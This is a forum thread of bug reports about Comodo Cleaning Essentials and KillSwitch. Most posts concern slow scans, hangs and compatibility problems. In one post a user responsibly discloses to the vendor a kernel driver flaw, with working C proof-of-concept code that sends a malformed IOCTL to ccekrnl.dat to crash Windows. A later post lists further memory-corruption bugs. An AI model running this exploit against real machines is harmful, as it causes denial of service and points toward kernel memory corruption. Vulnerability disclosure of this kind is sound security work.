- Your Operating System (32 or 64 bit) and Service Pack revision
WIndows 7 64 Bit - Other Security and Utility Software Installed
MBAM and Hitmanpro - Step by step description to reproduce the issue
Run a full scan - How you tried to resolve the problem
I can’t - Upload Memory Dumps on crash if you encounter any
There is no crash - Attach screenshots to your posts to clarify the issue further
No need - Any other information you think that might be useful
Yeh, CCE the scanner uses 1.600k of RAM . Which is horrible…
Hello
I have now downloaded CCE, have switched off when the Defense + CSS.
CCE then started, download updates, Pc restarted.
Then full scan.
I have 120gb, 2gb ram, Win7 Ultimate with CIS.
(Intel Atom 330 1.60GHz)
The problem is the first time when it took almost 5 hours of scanning, after which it hangs during the following process: C: \ bootsect.exe
The PC is slowly converting my total, and the processor performance is totally runter.der entire Ram is also consumed almost.
clamav says: (PUA.Packed.ASPack)
http://www.virustotal.com/file-scan/report.html?id=1ead513209277e335e00a7779d48d43110c8719bd160755280fcc6d5ecc27b29-1293397887
[attachment deleted by admin]
This might explain it:
is cce suppose to take 100% cpu while downloading the updates?
- Windows xp 32-bit
- Other Security and Utility Software Installed: none
- Step by step description to reproduce the issue:run a full scan
- Upload Memory Dumps on crash if you encounter any: cce.rar
[attachment deleted by admin]
Sorry if this isn’t the correct format - I wrote this up pretty quickly.
You have a security vulnerability (denial of service) in your ccekrnl.dat driver. I’ve attached the test program (as usual ;)).
Instructions:
- Run KillSwitch.exe. Whatever it takes to get the ccekrnl.dat driver loaded.
- Run TestPh.exe (attached).
- Press ENTER.
- The computer BSODs.
Tested on XP, 32-bit.
Also: Sorry if I sound like an a**hole, but you guys are referencing a lot of user-passed handles with KernelMode. That’s another set of security vulnerabilities…
Also 2: You don’t pass an ObjectType to ObReferenceObjectByHandle, so I could pass a process handle where you’re assuming it’s a file object, and BSOD the system…
Code:
NTSTATUS status;
HANDLE deviceHandle;
IO_STATUS_BLOCK isb;
UNICODE_STRING deviceName;
OBJECT_ATTRIBUTES objectAttributes;
UCHAR buffer[0x221];
RtlInitUnicodeString(&deviceName, L"\\Device\\CCEKrnl");
InitializeObjectAttributes(
&objectAttributes,
&deviceName,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
if (!NT_SUCCESS(NtOpenFile(&deviceHandle, FILE_GENERIC_READ,
&objectAttributes, &isb, FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE)))
{
wprintf(L"Can't open CCEKrnl driver.\n");
return;
}
wprintf(L"Press ENTER to crash the computer.\n");
getchar();
memset(buffer, 0, sizeof(buffer));
// Buffer length.
*(PULONG)buffer = 0x221;
// The driver expects a length for memset at offset 12.
// Pass a huge one so we overwrite lots of stuff and BSOD.
*(PULONG)(buffer + 12) = 0xdeadbeef;
status = NtDeviceIoControlFile(
deviceHandle,
NULL,
NULL,
NULL,
&isb,
0x7be2054,
buffer,
sizeof(buffer),
NULL,
0
);
NtClose(deviceHandle);
[attachment deleted by admin]
Also: Sorry if I sound like an a**hole, but you guys are referencing a lot of user-passed handles with KernelMode. That's another set of security vulnerabilities...Also 2: You don’t pass an ObjectType to ObReferenceObjectByHandle, so I could pass a process handle where you’re assuming it’s a file object, and BSOD the system…
Thats NOT being an a**hole, that’s being very helpfull.
If there’s any security vulnerabilities or bugs that your aware of, PLEASE let us know. THE MORE THE BETTER
You can PM melih or any mods with any reports(No Limits), if you want to keep it private
P.S. If anyone bad mouths YOU for reporting bugs, I’ll be more then happy edit that persons post, warnings or bans if needed 
Its good keep up !
Thanks for the report.
cpf=unknown ???
DACS says file to large anyway should be a safe file.
Winx64 using KillSwitch 32bit
[attachment deleted by admin]
The scan takes very long time.
[attachment deleted by admin]
thats too long…i am sure there is a bug…
I also believe that there is a bug
from the following file is always end.
the pc is totally off because of slow
C: \ bootsect.exe
http://virscan.org/report/de1ffd5ef7b8877589da005e5dd16f8f.html
Win7 Ulimate 32 bit, 2Gb Ram,1,60Ghz,
Only Comodo CIS5 Complet, Zemana AntiLogger, winpatrol free edition e Malwarebytes’ Anti-Malware 1.50.1.1100 (free version)Versão da Base de Dados: 5402.Windows Defender is turned off
see also attachment: killswitch
[attachment deleted by admin]
im not sure this is a COMODO problem, but its probably worth reporting anyway:
- Your Operating System = 64 bit Win7 home premium
- Other Security and Utility Software Installed= Microsoft Security essentials 2, Agnitum Outpost firewall pro 7
- Step by step description to reproduce the issue= CCE simply will not open with outpost firewall installed, even after giving full permissions to CCE under outposts settings and/or disabling it completely.
- See #3, also tried uninstalling MSE with no luck. CCE only worked after uninstalling outpost
- n/a
- n/a
- There is no problem with killswitch, only with CCE. surely someone else out there has tried CCE who is also using Outpost, if this problem is only on my system i’d like to know.
thank you
Please read the Original Post, from this part down:
Here is what you need to do in order o identify the problematic file while scanning:
That what is shown in the status field doesn’t have to be the file that kill’s the scan, as the scanner is multithreaded it could easily be hanging on an other file.
Can you please follow this advice and let the dev’s know which file(s) cause this?
1:30 hour takes it for me to scan a clean pc wich only had installed sql server
winxp 32
total used space 5.6gb of 16gb
files scanned 336,740
(there are only 19,764 files)
there is for sure a bad way to scan files: i noticed for an exe files it was scanning all the compressed files inside they. i think thats the pricipal reason for the slow scan
More bugs in ccekrnl.dat, along with suggestions. Please excuse the made-up function names.
- Control code 0x7BE2050 calls CceQueryInformationFile. You should pass Irp->RequestorMode and *IoFileObjectType to ObReferenceObjectByHandle. This applies to all the other functions as well.
- Same control code. You pass the variable-length end of SystemBuffer to the Buffer used by CceQueryInformationFile. But you don’t check Length, so I could pass a huge length while requesting a huge amount of information that overflows SystemBuffer, resulting in pool corruption.
- Control code 0x7BE2054 calls CceQueryDirectoryFile. You call RtlInitUnicodeString on buffer->FileName, but I could fill the entire buffer from there with 0xff and there could be a chance, however small, that RtlInitUnicodeString will keep scanning for a zero into invalid memory. You should make user-mode pass a UNICODE_STRING because it’s easier to probe.
- Same control code. I already reported that Length wasn’t getting checked.
- CceWriteFile. You don’t check Length.
- CceReadFile. You don’t check Length.
- In both CceWriteFile and CceReadFile you don’t acquire the file object lock, and you don’t check if the file was opened for synchronous I/O, which could be a problem…
- Your custom create-file and close-file thing is just plain weird… :o
BTW, I’m getting the impression that you guys don’t really care if this driver is secure (that file object thing scares me). Please let me know if that’s the case :).
thanks wj32 for all your help , keep up the good work.
[at] egemen
I know that u guys are working on fixing DACS , but I thought that this might help.
on my end , DACS sometimes works and sometimes don’t , but when it works only the DACS F-secure always gives me a DACS.error (timesout) !! , and all the other DACS AVs are working perfectly. It’s always like that when it works on my end. ( see attached picture ).
edit : Win Vista sp2 32bit , Norton av 2011 , CIS 5 (w/ AV disabled).
[attachment deleted by admin]
Hi
Unable to run CCE from a limited account. Although CCE prompts for administrator rights on launch, entering the administrator password does not work. Using “Run As” (with the same dialog box) works.
- Your Operating System (32 or 64 bit) and Service Pack revision: XP Pro SP3 (32-bit)
- Other Security and Utility Software Installed: CIS, CB, CSC, CDE (beta), TrueCrypt and Secunia PSI
- Step by step description to reproduce the issue: Load CCE.exe under limited account
- How you tried to resolve the problem: Using “Run As” gets around problem
- Upload Memory Dumps on crash if you encounter any (see on bottom on how to do a memory dump or forced it to product a memory dump) <–This makes it easier for the delvopers to fix stubbern bugs, freezes, glitchs and such WITH THE BUG REPORT(not required but very very helpfull) (((If you don’t want to post the link to the memory dump, then PM a Mod with the link for the dump)))): n/a
- Attach screenshots to your posts to clarify the issue further: n/a
- Any other information you think that might be useful: n/a
Hi, Graham1
Thanks for your report.
I dunno if it’s a bug but for me DACS never works at work behind a proxy. CCE is updating signatures without problems but DACS always shows this
Win XP x32 SP3 fully updated.
Funny is that at home (Seven x64) with “unsupported” x64 KillSwitch DACS is working fine.
[attachment deleted by admin]
That’s strange where is DACS.Avast on the Verdict list ??? ???